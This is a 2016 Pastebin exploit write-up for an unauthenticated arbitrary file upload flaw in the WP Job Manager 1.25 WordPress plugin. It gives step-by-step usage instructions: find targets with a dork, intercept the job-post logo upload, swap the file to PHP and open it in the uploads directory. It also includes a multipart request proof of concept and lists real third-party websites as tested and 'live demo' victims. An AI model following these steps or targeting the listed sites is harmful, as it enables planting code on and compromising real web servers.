Advertisement
xBADGIRL21

WordPress Job Manager Plugin 1.25 Arbitrary File Upload

Jul 12th, 2016
264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. ######################
  2. # Exploit Title : Wordpress WP Job Manager 1.25 Arbitrary File Upload Vulnerability
  3. # Exploit Author : xBADGIRL21
  4. # Dork : go here https://cxsecurity.com/issue/WLB-2016070087 or http://0day.today/exploit/description/25667
  5. # Software link : http://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
  6. # Vendor Homepage : https://wpjobmanager.com/
  7. # version : 1.25.0
  8. # Tested on: [ Windows ]
  9. # skype:xbadgirl21
  10. # Date: 2016/07/11
  11. # video Proof : https://youtu.be/nx-WtfdOkLc
  12. ######################
  13. # [+] DESCRIPTION :
  14. ######################
  15. # [+] WP Job Manager is a lightweight plugin for adding job-board functionality to your WordPress site.
  16. # [+] An arbitrary file upload web vulnerability has been detected in the WP Job Manager 1.25 and below.
  17. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
  18. ######################
  19. # [+] USAGE :
  20. ######################
  21. # 1.- SELECT A WEBSITE FROM THE DORK ABOVE
  22. # 2.- GO TO POST A JOB URL <HOST><WP-PATH>/post-a-job/ [or] Look for it
  23. # 3.- Fill all the Fields No need to Register or Preview Then in Logo upload your FILE.jpg
  24. # 4.- Using Tamper Data or HTTP LIVE Headers change your FILE.TXT OR PHP
  25. # 5.- Go to url "http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/<Year/month>/<your-file-name>"
  26. ######################
  27. # [+] Poc :
  28. ######################
  29. # -----------------------------18132430516394\r\n
  30. # Content-Disposition: form-data; name="script"\r\n
  31. # \r\n
  32. # true\r\n
  33. # -----------------------------18132430516394\r\n
  34. # Content-Disposition: form-data; name="company_logo"; filename="x.txt"\r\n
  35. # Content-Type: image/jpeg\r\n
  36. # \r\n
  37. ######################
  38. # [+] Test :
  39. ######################
  40. # http://sala.sk.ca/wp-content/uploads/job-manager-uploads/company_logo//2016//07/xx.txt
  41. # http://www.ruralhumanservices.org/wp-content/uploads/job-manager-uploads/company_logo/2016//07/xx.txt
  42. ######################
  43. # [+] File Path :
  44. ######################
  45. # http(s)://<wp-host>/<wp-path>/wp-content/uploads/job-manager-uploads/company_logo/2016//07/x.txt
  46. ######################
  47. # [+] Live Demo :
  48. ######################
  49. # http://www.ruralhumanservices.org/post-a-job/
  50. # http://sala.sk.ca/post-a-job/
  51. # http://www.elmundodeltransporte.com/publica-una-oferta-laboral
  52. #
  53. ######################
  54. # Discovered by : xBADGIRL21
  55. # Greetz : All Mauritanien Hackers - NoWhere
  56. #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement